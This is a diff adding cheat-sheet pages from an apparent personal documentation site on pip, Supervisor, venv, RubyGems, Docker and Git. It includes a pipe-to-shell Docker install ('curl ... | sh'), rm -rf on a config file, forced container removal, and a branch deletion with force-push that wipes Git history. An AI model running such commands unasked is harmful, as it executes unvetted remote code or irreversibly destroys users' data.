@@ -0,0 +1,174 @@
+
Pip Package Manager - 3os python pip package-manager cheat-sheet Authors: fire1ce | Created: 2021-09-02 | Last update: 2022-04-09 Pip Python Package Manager Cheat Sheet Pip is the package installer for Python. You can use it to install packages from the Python Package Index and other indexes.
List Installed Packages With Pip List Outdated Packages Install Or Update Package To Specific Version example with MySQL_python package:
pip install MySQL_python == 1 .2.2
+
Update Package To The Latest Available Version example with MySQL_python package:
pip install MySQL_python --upgrade
+
Update Pip Itself pip install --upgrade pip
+
Update All Packages Installed With Pip pip list --outdated --format= freeze | grep -v '^\-e' | cut -d = -f 1 | xargs -n1 pip install -U
+
Generate requirements.txt For a Project Run this command at terminal at the root of the project:
pip freeze > requirements.txt
+
Back to top
\ No newline at end of file
diff --git a/development/python/supervisor/index.html b/development/python/supervisor/index.html
new file mode 100644
index 000000000..2c51ac9b7
--- /dev/null
+++ b/development/python/supervisor/index.html
@@ -0,0 +1,259 @@
+
Supervisor Process Manager - 3os python supervisor processes-manager cheat-sheet Authors: fire1ce | Created: 2022-03-24 | Last update: 2022-04-24 Supervisor Python Processes Management Supervisor is a client/server system that allows its users to monitor and control a number of processes on UNIX-like operating systems. Official Supervisord Docs .
Example of Supervisord Web UI listening on localhost:9999
Tips of Supervisor Usage Seeing all child processes running
supervisorctl -c /path/to/supervisord.conf
+
I find it helpful to create an alias in my bash profile for those 2 commands above so that I don't have to manually type -c
all the time
Example:
echo "alias supervisord='supervisord -c /System/Volumes/Data/opt/homebrew/etc/supervisord.conf'"
+echo "alias supervisorctl='supervisorctl -c /System/Volumes/Data/opt/homebrew/etc/supervisord.conf'"
+
List All Processes You need to provide the path to the supervisor configuration file with -c /path/to/supervisord.conf
supervisorctl -c /System/Volumes/Data/opt/homebrew/etc/supervisord.conf
+
Reload Changes from Config File to Supervisor Update Supervisor Configuration MacOS Supervisor Installation Install with pip as system package:
brew install supervisor
+
The default location of the supervisor configuration file is at /System/Volumes/Data/opt/homebrew/etc/supervisord.conf
.
You can use a symbolic link to the configuration file to make it persistent. For example, you can move the configuration file to Dropbox folder and use a symbolic link to it.
Link the configuration file to the Dropbox folder:
rm -rf /System/Volumes/Data/opt/homebrew/etc/supervisord.conf
+ln -s /Users/fire1ce/Dropbox/SettingsConfigs/supervisor/supervisord.conf /System/Volumes/Data/opt/homebrew/etc/supervisord.conf
+
Start Supervisor Service on Boot In order to start the supervisor service on boot, we need to create a service file for MacOS.
sudo nano /Library/LaunchDaemons/com.agendaless.supervisord.plist
+
Append the following content to the file:
<!-- /Library/LaunchDaemons/com.agendaless.supervisord.plist -->
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version= "1.0" >
+<dict>
+ <key> KeepAlive</key>
+ <dict>
+ <key> SuccessfulExit</key>
+ <false/>
+ </dict>
+ <key> Label</key>
+ <string> com.agendaless.supervisord</string>
+ <key> ProgramArguments</key>
+ <array>
+ <string> /opt/homebrew/bin/supervisord</string>
+ <string> -n</string>
+ <string> -c</string>
+ <string> /System/Volumes/Data/opt/homebrew/etc/supervisord.conf</string>
+ </array>
+ <key> RunAtLoad</key>
+ <true/>
+</dict>
+</plist>
+
Supervisor Configuration File Example With 2 Managed Processes: [ unix_http_server ]
+file=/opt/homebrew/var/run/supervisor.sock # the path to the socket file
+
+
+[ inet_http_server ] # inet (TCP) server disabled by default
+port=127.0.0.1:9999 # ip_address:port specifier, *:port for all iface
+# username=user # default is no username (open server)
+# password=123 default is no password (open server)
+
+[ supervisord ]
+logfile=/opt/homebrew/var/log/supervisord.log # main log file# default $CWD/supervisord.log
+logfile_maxbytes=50MB # max main logfile bytes b4 rotation# default 50MB
+logfile_backups=10 # # of main logfile backups# 0 means none, default 10
+loglevel=info # log level# default info# others: debug,warn,trace
+pidfile=/opt/homebrew/var/run/supervisord.pid # supervisord pidfile# default supervisord.pid
+nodaemon=false # start in foreground if true# default false
+silent=false # no logs to stdout if true# default false
+minfds=1024 # min. avail startup file descriptors# default 1024
+minprocs=200 # min. avail process descriptors#default 200
+
+[ rpcinterface : supervisor ]
+supervisor.rpcinterface_factory = supervisor.rpcinterface:make_main_rpcinterface
+
+[supervisorctl]
+serverurl=unix:///opt/homebrew/var/run/supervisor.sock
+
+[include]
+files = /opt/homebrew/etc/supervisor.d/*.ini
+
+[program:macos-bt-connect-based-on-ip]
+command=/Users/fire1ce/.pyenv/versions/macos-bt-connect-based-on-ip/bin/python /Users/fire1ce/projects/macos-bt-connect-based-on-ip/macos-bt-connect-based-on-ip.py
+directory=/Users/fire1ce/projects/macos-bt-connect-based-on-ip
+user=fire1ce
+autostart=true
+autorestart=true
+startsecs=2
+startretries=3
+stdout_logfile=/opt/homebrew/var/log/macos-bt-connect-based-on-ip.out.log
+stdout_logfile_maxbytes=1MB # max # logfile bytes b4 rotation (default 50MB)
+stdout_logfile_backups=5 # # of stdout logfile backups (0 means none, default 10)
+stderr_logfile=/opt/homebrew/var/log/macos-bt-connect-based-on-ip.err.log
+stderr_logfile_maxbytes=1MB # max # logfile bytes b4 rotation (default 50MB)
+stderr_logfile_backups=5 # # of stderr logfile backups (0 means none, default 10)
+
+
+[ program : macos-screenlock-api ]
+command=/Users/fire1ce/.pyenv/versions/macos-screenlock-api/bin/python /Users/fire1ce/projects/macos-screenlock-api/macos-screenlock-api.py
+directory=/Users/fire1ce/projects/macos-screenlock-api
+user=fire1ce
+autostart=true
+autorestart=true
+startsecs=2
+startretries=3
+stdout_logfile=/opt/homebrew/var/log/macos-screenlock-api.out.log
+stdout_logfile_maxbytes=1MB # max # logfile bytes b4 rotation (default 50MB)
+stdout_logfile_backups=5 # # of stdout logfile backups (0 means none, default 10)
+stderr_logfile=/opt/homebrew/var/log/macos-screenlock-api.err.log
+stderr_logfile_maxbytes=1MB # max # logfile bytes b4 rotation (default 50MB)
+stderr_logfile_backups=5 # # of stderr logfile backups (0 means none, default 10)
+
Back to top
\ No newline at end of file
diff --git a/development/python/virtualenv/index.html b/development/python/virtualenv/index.html
new file mode 100644
index 000000000..d84e46c02
--- /dev/null
+++ b/development/python/virtualenv/index.html
@@ -0,0 +1,173 @@
+
Virtual Environment - 3os python venv cheat-sheet Python Virtual Environment About Python Virtual Environment - venv venv is a tool to create isolated Python environments. Since Python 3.3, a subset of it has been integrated into the standard library under the venv module. The venv module provides support for creating lightweight "virtual environments" with their own site directories, optionally isolated from system site directories. Each virtual environment has its own Python binary (which matches the version of the binary that was used to create this environment) and can have its own independent set of installed Python packages in its site directories.
Install venv In order to install venv
, we need to install the following packages:
apt example sudo apt install python3-venv
+
Initialization of a Virtual Environment Go to the root destination of your project and run the following command:
This will create a virtual environment in the current directory. The virtual environment folder will be named .venv
.
Activation of a Virtual Environment In order to activate a virtual environment, from the root directory of your project, run the following command:
source .venv/bin/activate
+
Check if the virtual environment is activated by running the following command:
The output should be with ../.venv/bin/python
as the output.
Bonus:
You can add an alias to your bash profile to make it easier to activate the virtual environment:
alias activate = 'source .venv/bin/activate'
+
Deactivation of a Virtual Environment When you are done with the virtual environment, you can deactivate it by running the following command:
Or alternatively you can exit the current shell.
Back to top
\ No newline at end of file
diff --git a/development/ruby/ruby/index.html b/development/ruby/ruby/index.html
new file mode 100644
index 000000000..093d9064b
--- /dev/null
+++ b/development/ruby/ruby/index.html
@@ -0,0 +1,153 @@
+
Ruby Gem Package Manager - 3os ruby gem package-manager cheat-sheet Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-04-09 Ruby Gem Package Manager RubyGems is a package manager for the Ruby programming language that provides a standard format for distributing Ruby programs and libraries (in a self-contained format called a "gem"), a tool designed to easily manage the installation of gems, and a server for distributing them.
Finding Installed And Available Gems Installing New Gems gem install rails_utils
+
Removing / Deleting Gems gem uninstall rails_utils
+
Finding Outdated Gems Update All the Gems Install rubygems-update
gem install rubygems-update
+
Then run:
gem update --system
+update_rubygems
+
Reading The Gem Documentation One of the most handy and important things about gems is that they [should] come with good documentation to allow you to start working with them fast. The simplest way to go with documentation is to run a local server where you will have access to all installed gems' usage instructions.
Run the following to run a documentation server:
it will start a server on port 8808.
# Server started at http://0.0.0.0:8808
+
Back to top
\ No newline at end of file
diff --git a/devops/docker/common-docker-commands/index.html b/devops/docker/common-docker-commands/index.html
new file mode 100644
index 000000000..7b7ded918
--- /dev/null
+++ b/devops/docker/common-docker-commands/index.html
@@ -0,0 +1,187 @@
+
Common Docker Commands - 3os docker cheat-sheet Common Docker Commands This is a short summary of the most commonly used Docker commands. If you're new to Docker, or even experienced Docker, it can be helpful to have a quick reference to the most commonly used Docker commands for managing the Docker environment.
Show all Containers Including Running and Stopped Show Docker Container Logs docker logs <container_id>
+
Get A Container Shell docker exec -it <container_id> /bin/bash
+
or
docker exec -it <container_id> /bin/sh
+
depending on the shells available on the Docker image.
Stopping Containers docker stop <container_id>
+
force stop with kill
docker kill <container_id>
+
Removing Containers docker rm <container_id>
+
force remove
docker rm -f <container_id>
+
Find Container IP Address docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' <container name/id>
+
Copy Files into Docker Container docker cp <local file> <container name/id>:<remote file>
+
Copy Files from Docker Container docker cp <container name/id>:<remote file> <local file>
+
Purging Purging All Unused or Dangling Images, Containers, Volumes, and Networks Docker provides a single command that will clean up any resources — images, containers, volumes, and networks — that are dangling (not associated with a container):
To additionally remove any stopped containers and all unused images (not just dangling images), add the -a flag to the command:
Monitor System Resource Utilization for Running Containers To check the CPU, memory, and network I/O usage of a single container, you can use:
docker stats <container>
+
For all containers listed by ID:
docker stats $( docker ps -q)
+
For all containers listed by name:
docker stats $( docker ps --format '{{.Names}}' )
+
For all containers listed by image:
docker ps -a -f ancestor = ubuntu
+
Remove all untagged images:
+docker rmi $( docker images | grep "^<none>" | awk '{split($0,a," "); print a[3]}' )
+
Remove container by a regular expression:
docker ps -a | grep wildfly | awk '{print $1}' | xargs docker rm -f
+
Remove all exited containers:
docker rm -f $( docker ps -a | grep Exit | awk '{ print $1 }' )
+
Credit Thanks to @wsargent for creating this cheat sheet.
Back to top
\ No newline at end of file
diff --git a/devops/docker/docker-containers/index.html b/devops/docker/docker-containers/index.html
new file mode 100644
index 000000000..36cf393f2
--- /dev/null
+++ b/devops/docker/docker-containers/index.html
@@ -0,0 +1,173 @@
+
Containers Cheat Sheet - 3os docker cheat-sheet Authors: fire1ce | Created: 2022-03-19 | Last update: 2022-03-24 Docker Containers Cheat Sheet What's a Docker Container? A Docker container image is a lightweight, standalone, executable package of software that includes everything needed to run an application: code, runtime, system tools, system libraries and settings.
Containers Your basic isolated Docker process . Containers are to Virtual Machines as threads are to processes. Or you can think of them as chroots on steroids.
Lifecycle Normally if you run a container without options it will start and stop immediately; if you want to keep it running you can use the command, docker run -td container_id
this will use the option -t
that will allocate a pseudo-TTY session and -d
that will detach automatically the container (run container in background and print container ID).
If you want a transient container, docker run --rm
will remove the container after it stops.
If you want to map a directory on the host to a docker container, docker run -v $HOSTDIR:$DOCKERDIR
. Also see Volumes .
If you want to remove also the volumes associated with the container, the deletion of the container must include the -v
switch like in docker rm -v
.
There's also a logging driver available for individual containers in docker 1.10. To run docker with a custom log driver (i.e., to syslog), use docker run --log-driver=syslog
.
Another useful option is docker run --name yourname docker_image
because when you specify the --name
inside the run command this will allow you to start and stop a container by calling it with the name that you specified when you created it.
Starting and Stopping If you want to detach from a running container, use Ctrl + p, Ctrl + q
. If you want to integrate a container with a host process manager , start the daemon with -r=false
then use docker start -a
.
If you want to expose container ports through the host, see the exposing ports section.
Restart policies on crashed docker instances are covered here .
CPU Constraints You can limit CPU, either using a percentage of all CPUs, or by using specific cores.
For example, you can tell the cpu-shares
setting. The setting is a bit strange -- 1024 means 100% of the CPU, so if you want the container to take 50% of all CPU cores, you should specify 512. See https://goldmann.pl/blog/2014/09/11/resource-management-in-docker/#_cpu for more:
docker run -it -c 512 agileek/cpuset-test
+
You can also only use some CPU cores using cpuset-cpus
. See https://agileek.github.io/docker/2014/08/06/docker-cpuset/ for details and some nice videos:
docker run -it --cpuset-cpus= 0 ,4,6 agileek/cpuset-test
+
Note that Docker can still see all of the CPUs inside the container -- it just isn't using all of them. See https://github.com/docker/docker/issues/20770 for more details.
Memory Constraints You can also set memory constraints on Docker:
docker run -it -m 300M ubuntu:14.04 /bin/bash
+
Capabilities Linux capabilities can be set by using cap-add
and cap-drop
. See https://docs.docker.com/engine/reference/run/#/runtime-privilege-and-linux-capabilities for details. This should be used for greater security.
To mount a FUSE based filesystem, you need to combine both --cap-add and --device:
docker run --rm -it --cap-add SYS_ADMIN --device /dev/fuse sshfs
+
Give access to a single device:
docker run -it --device= /dev/ttyUSB0 debian bash
+
Give access to all devices:
docker run -it --privileged -v /dev/bus/usb:/dev/bus/usb debian bash
+
More info about privileged containers here .
Info docker ps
shows running containers. docker logs
gets logs from container. (You can use a custom log driver, but logs is only available for json-file
and journald
in 1.10). docker inspect
looks at all the info on a container (including IP address). docker events
gets events from container. docker port
shows public facing port of container. docker top
shows running processes in container. docker stats
shows containers' resource usage statistics. docker diff
shows changed files in the container's FS. docker ps -a
shows running and stopped containers.
docker stats --all
shows a list of all containers, default shows just running.
Import / Export docker cp
copies files or folders between a container and the local filesystem. docker export
turns container filesystem into tarball archive stream to STDOUT. Executing Commands To enter a running container, attach a new shell process to a running container called foo, use: docker exec -it foo /bin/bash
.
Credit Thanks to @wsargent for creating this cheat sheet.
Back to top
\ No newline at end of file
diff --git a/devops/docker/docker-images/index.html b/devops/docker/docker-images/index.html
new file mode 100644
index 000000000..4733023f1
--- /dev/null
+++ b/devops/docker/docker-images/index.html
@@ -0,0 +1,171 @@
+
Images Cheat Sheet - 3os docker cheat-sheet Authors: fire1ce | Created: 2022-03-19 | Last update: 2022-03-24 Docker Images Cheat Sheet What's a Docker Image? A Docker image is a file used to execute code in a Docker container. Docker images act as a set of instructions to build a Docker container, like a template. Docker images also act as the starting point when using Docker. An image is comparable to a snapshot in virtual machine (VM) environments.
Images Images are just templates for docker containers .
Lifecycle docker images
shows all images. docker import
creates an image from a tarball. docker build
creates image from Dockerfile. docker commit
creates image from a container, pausing it temporarily if it is running. docker rmi
removes an image. docker load
loads an image from a tar archive as STDIN, including images and tags (as of 0.7). docker save
saves an image to a tar archive stream to STDOUT with all parent layers, tags & versions (as of 0.7). Info Cleaning up While you can use the docker rmi
command to remove specific images, there's a tool called docker-gc that will safely clean up images that are no longer used by any containers. As of docker 1.13, docker image prune
is also available for removing unused images. See Prune .
Load/Save image Load an image from file:
docker load < my_image.tar.gz
+
Save an existing image:
docker save my_image:my_tag | gzip > my_image.tar.gz
+
Import/Export container Import a container as an image from file:
cat my_container.tar.gz | docker import - my_image:my_tag
+
Export an existing container:
docker export my_container | gzip > my_container.tar.gz
+
Difference between loading a saved image and importing an exported container as an image Loading an image using the load
command creates a new image including its history. Importing a container as an image using the import
command creates a new image excluding the history which results in a smaller image size compared to loading an image.
Credit Thanks to @wsargent for creating this cheat sheet.
Back to top
\ No newline at end of file
diff --git a/devops/docker/docker-install/index.html b/devops/docker/docker-install/index.html
new file mode 100644
index 000000000..847762689
--- /dev/null
+++ b/devops/docker/docker-install/index.html
@@ -0,0 +1,183 @@
+
Docker Installation - 3os docker cheat-sheet Authors: fire1ce | Created: 2022-03-19 | Last update: 2022-03-24 Docker Installation You can download and install Docker on multiple platforms. The following are the most common ways to install Docker on Linux, Mac, and Windows. You can also install Docker on other platforms if you have the necessary software.
Images Linux Run this quick and easy install script provided by Docker:
curl -sSL https://get.docker.com/ | sh
+
If you're not willing to run a random shell script, please see the installation instructions for your distribution.
If you are a complete Docker newbie, you should follow the series of tutorials now.
macOS Download and install Docker Community Edition . if you have Homebrew-Cask, just type brew install --cask docker
. Or Download and install Docker Toolbox . Docker For Mac is nice, but it's not quite as finished as the VirtualBox install. See the comparison .
NOTE Docker Toolbox is legacy. You should use Docker Community Edition, See Docker Toolbox .
Once you've installed Docker Community Edition, click the docker icon in Launchpad. Then start up a container:
That's it, you have a running Docker container.
If you are a complete Docker newbie, you should probably follow the series of tutorials now.
Windows 10 Instructions to install Docker Desktop for Windows can be found here
Once installed, open powershell as administrator and run:
# Display the version of docker installed:
+docker version
+
+# Pull, create, and run 'hello-world':
+docker run hello-world
+
To continue with this cheat sheet, right click the Docker icon in the system tray, and go to settings. In order to mount volumes, the C:/ drive will need to be enabled in the settings so that information can be passed into the containers (later described in this article).
To switch between Windows containers and Linux containers, right click the icon in the system tray and click the button to switch container operating system. Doing this will stop the current containers that are running, and make them inaccessible until the container OS is switched back.
Additionally, if you have WSL or WSL2 installed on your desktop, you might want to install the Linux Kernel for Windows. Instructions can be found here . This requires the Windows Subsystem for Linux feature. This will allow for containers to be accessed by WSL operating systems, as well as the efficiency gain from running WSL operating systems in docker. It is also preferred to use Windows terminal for this.
Windows Server 2016 / 2019 Follow Microsoft's instructions that can be found here
If using the latest edge version of 2019, be prepared to only work in powershell, as it is only a servercore image (no desktop interface). When starting this machine, it will login and go straight to a powershell window. It is recommended to install text editors and other tools using Chocolatey .
After installing, these commands will work:
# Display the version of docker installed:
+docker version
+
+# Pull, create, and run 'hello-world':
+docker run hello-world
+
Windows Server 2016 is not able to run Linux images.
Windows Server Build 2004 is capable of running both linux and windows containers simultaneously through Hyper-V isolation. When running containers, use the --isolation=hyperv
command, which will isolate the container using a separate kernel instance.
Check Version It is very important that you always know the current version of Docker you are currently running on at any point in time. This is very helpful because you get to know what features are compatible with what you have running. This is also important because you know what containers to run from the docker store when you are trying to get template containers. That said let see how to know which version of docker we have running currently.
Get the server version:
$ docker version --format '{{.Server.Version}}'
+1.8.0
+
You can also dump raw JSON data:
$ docker version --format '{{json .}}'
+{"Client":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"am"}
+
Credit Thanks to @wsargent for creating this cheat sheet.
Back to top
\ No newline at end of file
diff --git a/devops/docker/docker-networks/index.html b/devops/docker/docker-networks/index.html
new file mode 100644
index 000000000..d630db6ee
--- /dev/null
+++ b/devops/docker/docker-networks/index.html
@@ -0,0 +1,179 @@
+
Networks & Links Cheat Sheet - 3os docker cheat-sheet Authors: fire1ce | Created: 2022-03-23 | Last update: 2022-03-24 Docker Networks & Links Cheat Sheet Networks Docker has a networks feature. Docker automatically creates 3 network interfaces when you install it (bridge, host, none). A new container is launched into the bridge network by default. To enable communication between multiple containers, you can create a new network and launch containers in it. This enables containers to communicate to each other while being isolated from containers that are not connected to the network. Furthermore, it allows to map container names to their IP addresses. See working with networks for more details.
Lifecycle docker network create
NAME Create a new network (default type: bridge). docker network rm
NAME Remove one or more networks by name or identifier. No containers can be connected to the network when deleting it. Info Connection You can specify a specific IP address for a container :
# create a new bridge network with your subnet and gateway for your ip block
+docker network create --subnet 203 .0.113.0/24 --gateway 203 .0.113.254 iptastic
+
+# run a nginx container with a specific ip in that block
+$ docker run --rm -it --net iptastic --ip 203 .0.113.2 nginx
+
+# curl the ip from any other place (assuming this is a public ip block duh)
+$ curl 203 .0.113.2
+
Links Links are how Docker containers talk to each other through TCP/IP ports . Atlassian show worked examples. You can also resolve links by hostname .
This has been deprecated to some extent by user-defined networks .
NOTE: If you want containers to ONLY communicate with each other through links, start the docker daemon with -icc=false
to disable inter process communication.
If you have a container with the name CONTAINER (specified by docker run --name CONTAINER
) and in the Dockerfile, it has an exposed port:
Then if we create another container called LINKED like so:
docker run -d --link CONTAINER:ALIAS --name LINKED user/wordpress
+
Then the exposed ports and aliases of CONTAINER will show up in LINKED with the following environment variables:
$ALIAS_PORT_1337_TCP_PORT
+$ALIAS_PORT_1337_TCP_ADDR
+
And you can connect to it that way.
To delete links, use docker rm --link
.
Generally, linking between docker services is a subset of "service discovery", a big problem if you're planning to use Docker at scale in production. Please read The Docker Ecosystem: Service Discovery and Distributed Configuration Stores for more info.
Credit Thanks to @wsargent for creating this cheat sheet.
Back to top
\ No newline at end of file
diff --git a/devops/docker/docker-security/index.html b/devops/docker/docker-security/index.html
new file mode 100644
index 000000000..66099baf9
--- /dev/null
+++ b/devops/docker/docker-security/index.html
@@ -0,0 +1,175 @@
+
Security & Best Practices - 3os docker cheat-sheet Authors: fire1ce | Created: 2022-03-23 | Last update: 2022-03-24 Docker Security & Best Practices Security This is where security tips about Docker go. The Docker security page goes into more detail.
First things first: Docker runs as root. If you are in the docker
group, you effectively have root access . If you expose the docker unix socket to a container, you are giving the container root access to the host .
Docker should not be your only defense. You should secure and harden it.
For an understanding of what containers leave exposed, you should read Understanding and Hardening Linux Containers by Aaron Grattafiori . This is a complete and comprehensive guide to the issues involved with containers, with a plethora of links and footnotes leading on to yet more useful content. The security tips following are useful if you've already hardened containers in the past, but are not a substitute for understanding.
Security Tips For greatest security, you want to run Docker inside a virtual machine. This is straight from the Docker Security Team Lead -- slides / notes . Then, run with AppArmor / seccomp / SELinux / grsec etc to limit the container permissions . See the Docker 1.10 security features for more details.
Docker image ids are sensitive information and should not be exposed to the outside world. Treat them like passwords.
See the Docker Security Cheat Sheet by Thomas Sjögren : some good stuff about container hardening in there.
Check out the docker bench security script , download the white papers .
Snyk's 10 Docker Image Security Best Practices cheat sheet
You should start off by using a kernel with unstable patches for grsecurity / pax compiled in, such as Alpine Linux . If you are using grsecurity in production, you should spring for commercial support for the stable patches , same as you would do for RedHat. It's $200 a month, which is nothing to your devops budget.
Since docker 1.11 you can easily limit the number of active processes running inside a container to prevent fork bombs. This requires a linux kernel >= 4.3 with CGROUP_PIDS=y to be in the kernel configuration.
docker run --pids-limit=64
+
Also available since docker 1.11 is the ability to prevent processes from gaining new privileges. This feature has been in the linux kernel since version 3.5. You can read more about it in this blog post.
docker run --security-opt= no-new-privileges
+
From the Docker Security Cheat Sheet (it's in PDF which makes it hard to use, so copying below) by Container Solutions :
Turn off interprocess communication with:
docker -d --icc= false --iptables
+
Set the container to be read-only:
Verify images with a hashsum:
docker pull debian@sha256:a25306f3850e1bd44541976aa7b5fd0a29be
+
Set volumes to be read only:
docker run -v $( pwd ) /secrets:/secrets:ro debian
+
Define and run a user in your Dockerfile so you don't run as root inside the container:
RUN groupadd -r user && useradd -r -g user user
+USER user
+
User Namespaces There's also work on user namespaces -- it is in 1.10 but is not enabled by default.
To enable user namespaces ("remap the userns") in Ubuntu 15.10, follow the blog example .
Security Videos Security Roadmap The Docker roadmap talks about seccomp support . There is an AppArmor policy generator called bane , and they're working on security profiles .
Best Practices This is where general Docker best practices and war stories go:
Credit Thanks to @wsargent for creating this cheat sheet.
Back to top
\ No newline at end of file
diff --git a/devops/docker/watchtower/index.html b/devops/docker/watchtower/index.html
new file mode 100644
index 000000000..2d0a539e3
--- /dev/null
+++ b/devops/docker/watchtower/index.html
@@ -0,0 +1,194 @@
+
Watchtower - 3os docker container watchtower Authors: fire1ce | Created: 2021-12-03 | Last update: 2022-03-24 Watchtower
Quick Start With watchtower you can update the running version of your containerized app simply by pushing a new image to the Docker Hub or your own image registry. Watchtower will pull down your new image, gracefully shut down your existing container and restart it with the same options that were used when it was deployed initially. Run the watchtower container with the following command:
What is Watchtower? Watchtower is an application that will monitor your running Docker containers and watch for changes to the images that those containers were originally started from. If watchtower detects that an image has changed, it will automatically restart the container using the new image.
With watchtower you can update the running version of your containerized app simply by pushing a new image to the Docker Hub or your own image registry. Watchtower will pull down your new image, gracefully shut down your existing container and restart it with the same options that were used when it was deployed initially.
Full documentation can be found at Watchtower Documentation . Github repo can be found at Watchtower Github Repository .
Run Once You can run Watchtower run once
to force an update of containers by running the following command:
docker run --rm -v /var/run/docker.sock:/var/run/docker.sock containrrr/watchtower --run-once
+
Docker Compose Example Below is an example of a docker-compose.yml file that uses watchtower to automatically update your running containers at 3:30 AM every day, sending notifications to Telegram
with shoutrrr
version : '3'
+
+services :
+ watchtower :
+ image : containrrr/watchtower
+ container_name : watchtower
+ hostname : port-watchtower
+ restart : always
+ network_mode : bridge
+ volumes :
+ - /var/run/docker.sock:/var/run/docker.sock
+ - /etc/localtime:/etc/localtime
+ environment :
+ - WATCHTOWER_NOTIFICATIONS=shoutrrr
+ - WATCHTOWER_NOTIFICATION_URL=telegram://<Bot-api-token>@telegram/?channels=<channel-id>
+ command : --schedule '0 30 3 * * *' --cleanup
+
Back to top
\ No newline at end of file
diff --git a/devops/git/delete-commit-history/index.html b/devops/git/delete-commit-history/index.html
new file mode 100644
index 000000000..63540feff
--- /dev/null
+++ b/devops/git/delete-commit-history/index.html
@@ -0,0 +1,173 @@
+
Removing Sensitive Data - 3os github history security Authors: fire1ce | Created: 2022-02-04 | Last update: 2022-03-24 Removing Sensitive Data from a Repository History As humans, we sometimes make mistakes. One of them is committing sensitive data in our Git repository. If you commit sensitive data, such as a password, SSH key, API tokens, license keys and so on into a Git repository, you can remove it from the history. You can follow the official GitHub instructions to remove sensitive data from the history. It's probably the best and the right way to do it.
Below is a fast way to remove sensitive data from a repository's history but with a few caveats like losing all the history of the repository.
Delete Commit History in Github Repository Danger
This will remove your old commit history completely, You can’t recover it again!
Create Orphan Branch – Create a new orphan branch in git repository. The newly created branch will not show in ‘git branch’ command.
git checkout --orphan temp_branch
+
Add Files to Branch – Now add all files to newly created branch and commit them using following commands.
git add -A
+git commit -am "first commit"
+
Delete master/main Branch. Adjust the command according to your git repository
Rename Current Branch – After deleting the master/main branch, let’s rename newly created branch name to master/main .
Push Changes – You have completed the changes to your local git repository. Finally, push your changes to the remote master/main (Github) repository forcefully.
git push -f origin main
+
Back to top
\ No newline at end of file
diff --git a/devops/git/git-cli-cheat-sheet/index.html b/devops/git/git-cli-cheat-sheet/index.html
new file mode 100644
index 000000000..ece99284a
--- /dev/null
+++ b/devops/git/git-cli-cheat-sheet/index.html
@@ -0,0 +1,204 @@
+
Git Cli Cheat Sheet - 3os github git cheat-sheet Git Cli Cheat Sheet Git is a free and open source distributed version control system designed to quickly and efficiently manage everything from small to very large projects.
Create Repositories A new repository can either be created locally, or an existing repository can be cloned. When a repository was initialized locally, you have to push it to GitHub afterwards.
The git init command turns an existing directory into a new Git repository inside the folder you are running this command. After using the git init
command, link the local repository to an empty GitHub repository using the following command:
Specifies the remote repository for your local repository. The url points to a repository on GitHub.
git remote add origin [ url]
+
Clone (download) a repository that already exists on GitHub, including all of the files, branches, and commits
Git Configuration Configure user information for all local repositories
Sets the name you want attached to your commit transactions
git config --global user.name "[name]"
+
Sets the email you want attached to your commit transactions
git config --global user.email "[email address]"
+
Enables helpful colorization of command line output
git config --global color.ui auto
+
Synchronize Changes Synchronize your local repository with the remote repository on GitHub.com
Downloads all history from the remote tracking branches
Combines remote tracking branches into current local branch
Uploads all local branch commits to GitHub
Updates your current local working branch with all new commits from the corresponding remote branch on GitHub. git pull
is a combination of git fetch
and git merge
Redo Commits Erase mistakes and craft replacement history
Undoes all commits after [commit], preserving changes locally
If you don't want to reset absolutely, but relatively that is also possible using
which undoes the last 2 commits. Discards all history and changes back to the specified commit
git reset --hard [ commit]
+
Branches Branches are an important part of working with Git. Any commits you make will be made on the branch you’re currently “checked out†to. Use git status to see which branch that is.
Creates a new branch
git branch [ branch-name]
+
Switches to the specified branch and updates the working directory
git switch -c [ branch-name]
+
or you can use
git checkout -b [ branch-name]
+
to both create and switch to the branch simultaneously. Combines the specified branch’s history into the current branch. This is usually done in pull requests, but is an important Git operation.
Deletes the specified branch
git branch -d [ branch-name]
+
Make Changes Browse and inspect the evolution of project files
Lists version history for the current branch
Lists version history for a file, beyond renames (works only for a single file)
git log --follow [ file]
+
Shows content differences between two branches
git diff [ first-branch] ...[ second-branch]
+
Outputs metadata and content changes of the specified commit
Snapshots the file in preparation for versioning
Records file snapshots permanently in version history
git commit -m "[descriptive message]"
+
The .gitignore file Sometimes it may be a good idea to exclude files from being tracked with Git. This is typically done in a special file named .gitignore. You can find helpful templates for .gitignore
files at github.com/github/gitignore . If there are certain files (like .vscode
or .ide
) that should be excluded from all projects, you can create a global .gitignore
file to do so.
Untrack Files Already Added to git Repository Based on .gitignore Commit all your changes. Before proceeding, make sure all your changes are committed, including your .gitignore file. Remove everything from the repository. To clear your repo, use:
Re add everything.
Commit.
git commit -m ".gitignore fix"
+
Use Gist as Repository It's probably easiest if you just start by cloning the gist, so that origin
(a "remote" that refers to the original repository) is set up for you. Then you can just do git push origin master
. For example:
git clone git@gist.github.com:869085.git mygist
+cd mygist
+
Add you changes to the repository.
git add .
+git commit -m "Better comments"
+git push origin master
+
However, if you don't want to redo your changes, you can do:
cd mygist
+git remote add origin git@gist.github.com:869085.git
+git fetch origin
+# Push your changes, also setting the upstream for master:
+git push -u origin master
+
Strictly speaking, the git fetch origin
and -u
argument to git push origin master
are optional, but they will helpfully associate the upstream branch master
in origin
with your local branch master
.
Back to top
\ No newline at end of file
diff --git a/devops/git/git-submodules/index.html b/devops/git/git-submodules/index.html
new file mode 100644
index 000000000..3283a3d67
--- /dev/null
+++ b/devops/git/git-submodules/index.html
@@ -0,0 +1,179 @@
+
Submodules Cheat Sheet - 3os github cheat-sheet submodules Authors: fire1ce | Created: 2022-03-23 | Last update: 2022-03-24 Git Submodules Cheat Sheet What is a Submodule? Git submodules allow you to keep a git repository as a subdirectory of another git repository. Git submodules are simply a reference to another repository at a particular snapshot in time. Git submodules enable a Git repository to incorporate and track version history of external code.
Add a Submodule You need to know the remote git repository url and where you want to place that it in your repository.
for example:
git submodule add https://github.com/fire1ce/3os.org path/to/submodule
+git add .
+git commit -m "adds submodule path/to/submodule"
+
Cloning A Project With Submodules When you clone a repository that contains submodules there are a few extra steps to be taken.
for example:
git clone https://github.com/fire1ce/3os.org repo
+cd repo
+git submodule init
+git submodule update
+
